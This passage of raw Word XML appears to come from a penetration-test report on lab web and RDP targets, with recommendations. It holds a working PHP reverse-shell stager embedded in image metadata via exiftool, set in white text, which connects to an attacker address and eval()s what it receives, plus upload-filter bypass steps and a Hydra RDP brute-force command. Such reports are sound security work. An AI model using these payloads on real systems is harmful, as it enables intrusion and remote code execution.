    <w:p w14:paraId="665DA6E4" w14:textId="77777777" w:rsidR="0097058A" w:rsidRPr="0034765E" w:rsidRDefault="0097058A" w:rsidP="0097058A">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">  - Step 1: Intercept the upload request using Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEA09E2" w14:textId="77777777" w:rsidR="0097058A" w:rsidRDefault="0097058A" w:rsidP="0097058A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">   Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698A1058" w14:textId="7E25A0C8" w:rsidR="0097058A" w:rsidRDefault="00911F12" w:rsidP="00911F12">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00911F12">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04961F75" wp14:editId="0E41764B">
            <wp:extent cx="5839640" cy="552527"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="206443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32570" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5839640" cy="552527"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D86121" w14:textId="70A1F9E0" w:rsidR="0097058A" w:rsidRPr="0034765E" w:rsidRDefault="0097058A" w:rsidP="0097058A">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">  - Step 2: Modify the content type of the uploaded file to "image/png".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032E4495" w14:textId="77777777" w:rsidR="0097058A" w:rsidRDefault="0097058A" w:rsidP="0097058A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">   Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2109C80C" w14:textId="56A085AC" w:rsidR="0097058A" w:rsidRDefault="00911F12" w:rsidP="00911F12">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00911F12">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6734F8AA" wp14:editId="551B0A7E">
            <wp:extent cx="5943600" cy="494665"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1593569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69013" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="494665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="551302D5" w14:textId="0F4C2585" w:rsidR="0097058A" w:rsidRPr="0097058A" w:rsidRDefault="0097058A" w:rsidP="0097058A">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0097058A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>- High Security Level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55608908" w14:textId="77777777" w:rsidR="0097058A" w:rsidRPr="0034765E" w:rsidRDefault="0097058A" w:rsidP="0097058A">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">  - Use a hex editor tool to prepend the PNG file signature to the .php file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7375E812" w14:textId="5FB1191A" w:rsidR="0097058A" w:rsidRPr="0034765E" w:rsidRDefault="0097058A" w:rsidP="0097058A">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">PNG </w:t>
      </w:r>
      <w:r w:rsidRPr="0034765E">
        <w:t>File Signature: 89 50 4E 47 0D 0A 1A 0A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB37D1F" w14:textId="77777777" w:rsidR="0097058A" w:rsidRDefault="0097058A" w:rsidP="0097058A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">   Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D408C6" w14:textId="4D12D470" w:rsidR="0097058A" w:rsidRDefault="00911F12" w:rsidP="0087020B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00911F12">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="666CA314" wp14:editId="70B920A9">
            <wp:extent cx="4544059" cy="1209844"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="86609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93990" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4544059" cy="1209844"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D54F786" w14:textId="786146BA" w:rsidR="0097058A" w:rsidRPr="0034765E" w:rsidRDefault="0097058A" w:rsidP="0097058A">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">  - </w:t>
      </w:r>
      <w:r w:rsidRPr="0034765E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve"> Embed a shell into a low-resolution image using exiftool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA88242" w14:textId="77777777" w:rsidR="0097058A" w:rsidRPr="0097058A" w:rsidRDefault="0097058A" w:rsidP="0097058A">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34765E">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="0097058A">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>exiftool -DocumentName='/*&lt;?php /**/ error_reporting(0); $ip = "192.168.2.128"; $port = 7777; if (($f = "stream_socket_client") &amp;&amp; is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = "stream"; } elseif (($f = "fsockopen") &amp;&amp; is_callable($f)) { $s = $f($ip, $port); $s_type = "stream"; } elseif (($f = "socket_create") &amp;&amp; is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = "socket"; } else { die("no socket funcs"); } if (!$s) { die("no socket"); } switch ($s_type) { case "stream": $len = fread($s, 4); break; case "socket": $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a["len"]; $b = ""; while (strlen($b) &lt; $len) { switch ($s_type) { case "stream": $b .= fread($s, $len-strlen($b)); break; case "socket": $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS["msgsock"] = $s; $GLOBALS["msgsock_type"] = $s_type; eval($b); die(); __halt_compiler();' exploit.jpeg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEF4FF9" w14:textId="77777777" w:rsidR="0097058A" w:rsidRDefault="0097058A" w:rsidP="0097058A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">   Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADBB150" w14:textId="29B5157E" w:rsidR="0097058A" w:rsidRDefault="008C2C3C" w:rsidP="0097058A">
      <w:r w:rsidRPr="008C2C3C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="109F4946" wp14:editId="527CE71B">
            <wp:extent cx="5943600" cy="1450975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="99583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35772" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1450975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="008C2C3C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C2C3C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F58EE76" wp14:editId="6025996E">
            <wp:extent cx="5943600" cy="1054100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="71363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30074" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1054100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E99E8C1" w14:textId="092E2A33" w:rsidR="0097058A" w:rsidRPr="0034765E" w:rsidRDefault="0097058A" w:rsidP="0097058A">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">  - Step 3: Set the upload page to "file:///../../hackable/uploads/exploit.php.jpeg".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46672F5E" w14:textId="77777777" w:rsidR="0097058A" w:rsidRDefault="0097058A" w:rsidP="0097058A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">   Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54790688" w14:textId="77777777" w:rsidR="00174E66" w:rsidRDefault="00174E66" w:rsidP="0097058A"/>
    <w:p w14:paraId="7F90F98B" w14:textId="63A88EBE" w:rsidR="0097058A" w:rsidRDefault="008C2C3C" w:rsidP="0097058A">
      <w:r w:rsidRPr="008C2C3C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7674A3F0" wp14:editId="29F2D380">
            <wp:extent cx="5943600" cy="1255594"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="156129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1035" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId50"/>
                    <a:srcRect b="24559"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1255594"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BD46BA" w14:textId="0F7D5819" w:rsidR="00724F44" w:rsidRPr="00174E66" w:rsidRDefault="0097058A" w:rsidP="00174E66">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
      </w:pPr>
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561B3907" w14:textId="31152F1D" w:rsidR="002B6036" w:rsidRPr="002B6036" w:rsidRDefault="002B6036" w:rsidP="002B6036">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B6036">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2.4 Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D67B2AF" w14:textId="77777777" w:rsidR="002B6036" w:rsidRDefault="002B6036" w:rsidP="002B6036"/>
    <w:p w14:paraId="458C58B8" w14:textId="77777777" w:rsidR="00800B42" w:rsidRDefault="00800B42" w:rsidP="00800B42">
      <w:r>
        <w:t>In order to address the vulnerabilities uncovered during the Web Attacks, the following recommendations are suggested:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3434691B" w14:textId="77777777" w:rsidR="00800B42" w:rsidRDefault="00800B42" w:rsidP="00800B42"/>
    <w:p w14:paraId="59B0F79D" w14:textId="54E17440" w:rsidR="00800B42" w:rsidRDefault="00800B42" w:rsidP="00800B42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Employ rigorous input validation and output encoding measures to mitigate Cross-Site Scripting attacks, including both DOM-based and stored XSS vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751834D3" w14:textId="23F0F184" w:rsidR="00800B42" w:rsidRDefault="00800B42" w:rsidP="00800B42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Employ parameterized queries or stored procedures to minimize the risk of SQL injection vulnerabilities and safeguard against unauthorized entry to the backend database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB79B6D" w14:textId="7471A463" w:rsidR="00800B42" w:rsidRDefault="00800B42" w:rsidP="00800B42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Integrate robust file upload validation procedures to limit the acceptable file kinds and sizes, and guarantee that uploaded files undergo thorough sanitization and execution inside a secure environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD41BF0" w14:textId="77777777" w:rsidR="004706AA" w:rsidRDefault="004706AA" w:rsidP="004706AA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="004706AA">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.3 Attack 3: Password Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404073E5" w14:textId="77777777" w:rsidR="004706AA" w:rsidRDefault="004706AA" w:rsidP="004706AA"/>
    <w:p w14:paraId="4C36F70A" w14:textId="4308D05B" w:rsidR="00594339" w:rsidRPr="00594339" w:rsidRDefault="004706AA" w:rsidP="00594339">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004706AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3.1 Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B02002" w14:textId="77777777" w:rsidR="00594339" w:rsidRPr="00594339" w:rsidRDefault="00594339" w:rsidP="00594339">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46C8E3B6" w14:textId="77777777" w:rsidR="00594339" w:rsidRPr="00594339" w:rsidRDefault="00594339" w:rsidP="00594339">
      <w:r w:rsidRPr="00594339">
        <w:t xml:space="preserve">I will exploit the weaknesses in authentication mechanisms to gain unauthorized access to systems or accounts. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEEBBC5" w14:textId="77777777" w:rsidR="004706AA" w:rsidRDefault="004706AA" w:rsidP="004706AA"/>
    <w:p w14:paraId="01CA4114" w14:textId="77777777" w:rsidR="004706AA" w:rsidRPr="004706AA" w:rsidRDefault="004706AA" w:rsidP="004706AA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="472F4F97" w14:textId="77777777" w:rsidR="004706AA" w:rsidRPr="004706AA" w:rsidRDefault="004706AA" w:rsidP="004706AA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004706AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3.2 Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0D3DF4" w14:textId="77777777" w:rsidR="004706AA" w:rsidRDefault="004706AA" w:rsidP="004706AA"/>
    <w:p w14:paraId="35F94BC9" w14:textId="77777777" w:rsidR="00594339" w:rsidRPr="00594339" w:rsidRDefault="00594339" w:rsidP="00594339">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37DD232E" w14:textId="77777777" w:rsidR="00594339" w:rsidRPr="00594339" w:rsidRDefault="00594339" w:rsidP="00594339">
      <w:r w:rsidRPr="00594339">
        <w:t>The mechanism used to attack weak passwords on the Remote Desktop Protocol (RDP) service was as follows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399B684A" w14:textId="77777777" w:rsidR="00594339" w:rsidRPr="00594339" w:rsidRDefault="00594339" w:rsidP="00594339"/>
    <w:p w14:paraId="19FCAACA" w14:textId="77777777" w:rsidR="00594339" w:rsidRPr="00594339" w:rsidRDefault="00594339" w:rsidP="00594339">
      <w:r w:rsidRPr="00594339">
        <w:t xml:space="preserve"> The IP address of the vulnerable Remote Desktop Protocol (RDP) service was identified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D30BAF0" w14:textId="77777777" w:rsidR="00594339" w:rsidRPr="00594339" w:rsidRDefault="00594339" w:rsidP="00594339"/>
    <w:p w14:paraId="21803B77" w14:textId="77777777" w:rsidR="00594339" w:rsidRPr="00594339" w:rsidRDefault="00594339" w:rsidP="00594339">
      <w:r w:rsidRPr="00594339">
        <w:t>Weak or default passwords for user accounts exposed the RDP service to brute force attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F761980" w14:textId="77777777" w:rsidR="00594339" w:rsidRPr="00594339" w:rsidRDefault="00594339" w:rsidP="00594339"/>
    <w:p w14:paraId="00BD121B" w14:textId="77777777" w:rsidR="00594339" w:rsidRPr="00594339" w:rsidRDefault="00594339" w:rsidP="00594339">
      <w:r w:rsidRPr="00594339">
        <w:t xml:space="preserve"> The attacker utilized the Hydra password cracking program to execute a brute force assault on the target machine's RDP server. Hydra was configured to try a list of frequently used passwords against the administrator account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706C37AC" w14:textId="77777777" w:rsidR="00594339" w:rsidRPr="00594339" w:rsidRDefault="00594339" w:rsidP="00594339"/>
    <w:p w14:paraId="02A0C597" w14:textId="77777777" w:rsidR="00594339" w:rsidRPr="00594339" w:rsidRDefault="00594339" w:rsidP="00594339">
      <w:r w:rsidRPr="00594339">
        <w:t xml:space="preserve"> Hydra accurately guesses the password and gets unauthorized access to the target workstation via RDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC8D37F" w14:textId="77777777" w:rsidR="00594339" w:rsidRPr="00594339" w:rsidRDefault="00594339" w:rsidP="00594339">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78FE5F1C" w14:textId="77777777" w:rsidR="004706AA" w:rsidRDefault="004706AA" w:rsidP="004706AA"/>
    <w:p w14:paraId="5193AF01" w14:textId="77777777" w:rsidR="004706AA" w:rsidRPr="004706AA" w:rsidRDefault="004706AA" w:rsidP="004706AA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004706AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3.3 Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ADA0B1" w14:textId="77777777" w:rsidR="004706AA" w:rsidRDefault="004706AA" w:rsidP="004706AA"/>
    <w:p w14:paraId="35D6E53A" w14:textId="77777777" w:rsidR="00594339" w:rsidRPr="00594339" w:rsidRDefault="00594339" w:rsidP="00594339">
      <w:r w:rsidRPr="00594339">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Vulnerability Exploited:</w:t>
      </w:r>
      <w:r w:rsidRPr="00594339">
        <w:t xml:space="preserve"> Weak Passwords on Remote Desktop Protocol (RDP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1024A595" w14:textId="77777777" w:rsidR="00594339" w:rsidRPr="00594339" w:rsidRDefault="00594339" w:rsidP="00594339">
      <w:r w:rsidRPr="00594339">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- System Vulnerable:</w:t>
      </w:r>
      <w:r w:rsidRPr="00594339">
        <w:t xml:space="preserve"> Remote Desktop Protocol (RDP) service on target machine (IP: 192.168.2.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F111DA" w14:textId="77777777" w:rsidR="00594339" w:rsidRPr="00594339" w:rsidRDefault="00594339" w:rsidP="00594339">
      <w:r w:rsidRPr="00594339">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Vulnerability Explanation</w:t>
      </w:r>
      <w:r w:rsidRPr="00594339">
        <w:t>: Attackers can exploit this vulnerability by attempting to guess the passwords of RDP accounts using automated tools or custom scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0346D867" w14:textId="77777777" w:rsidR="00594339" w:rsidRPr="00594339" w:rsidRDefault="00594339" w:rsidP="00594339">
      <w:r w:rsidRPr="00594339">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Vulnerability Fix:</w:t>
      </w:r>
      <w:r w:rsidRPr="00594339">
        <w:t xml:space="preserve">  administrators should enforce strong password policies and regularly audit user accounts for weak or default passwords. Additionally, implementing account lockout policies can help prevent brute force attacks by locking out user accounts after a certain number of failed login attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CDCBBD" w14:textId="77777777" w:rsidR="004706AA" w:rsidRDefault="004706AA" w:rsidP="004706AA">
      <w:r w:rsidRPr="004706AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Severity:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004706AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0DDAA5" w14:textId="77777777" w:rsidR="004706AA" w:rsidRPr="004706AA" w:rsidRDefault="004706AA" w:rsidP="004706AA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004706AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- Proof of Concept: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14669B15" w14:textId="072D6031" w:rsidR="008C2C3C" w:rsidRDefault="004706AA" w:rsidP="004706AA">
      <w:r>
        <w:t xml:space="preserve">   - </w:t>
      </w:r>
      <w:r w:rsidR="00BC4857">
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> perform a brute force attack against the RDP service</w:t>
      </w:r>
      <w:r w:rsidR="00BC4857">
        <w:t xml:space="preserve"> using this command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A899C45" w14:textId="50F0868C" w:rsidR="004706AA" w:rsidRPr="008C2C3C" w:rsidRDefault="009B5B72" w:rsidP="008C2C3C">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9B5B72">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>hydra -L usernames.txt -P passwords.txt rdp://192.168.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF21223" w14:textId="0D111FE2" w:rsidR="00D33387" w:rsidRDefault="004706AA" w:rsidP="004706AA">
      <w:r>
        <w:t xml:space="preserve">   - Hydra </w:t>
      </w:r>
      <w:r w:rsidR="00BC4857">
        <w:t>tries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> each </w:t>
      </w:r>
      <w:r w:rsidR="008C2C3C">
        <w:t xml:space="preserve">username with each </w:t>
      </w:r>
      <w:r>
        <w:t>password from the specified list until successful.</w:t>
      </w:r>
      <w:r w:rsidR="00D33387">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3CE2F9" w14:textId="3F8BAA38" w:rsidR="004706AA" w:rsidRDefault="00D33387" w:rsidP="004706AA">
      <w:r w:rsidRPr="00D33387">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C0E0041" wp14:editId="0FA5694E">
            <wp:extent cx="5943600" cy="2440305"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18596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5411" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2440305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DC577A" w14:textId="413A62CC" w:rsidR="004706AA" w:rsidRDefault="004706AA" w:rsidP="004706AA">
      <w:r>
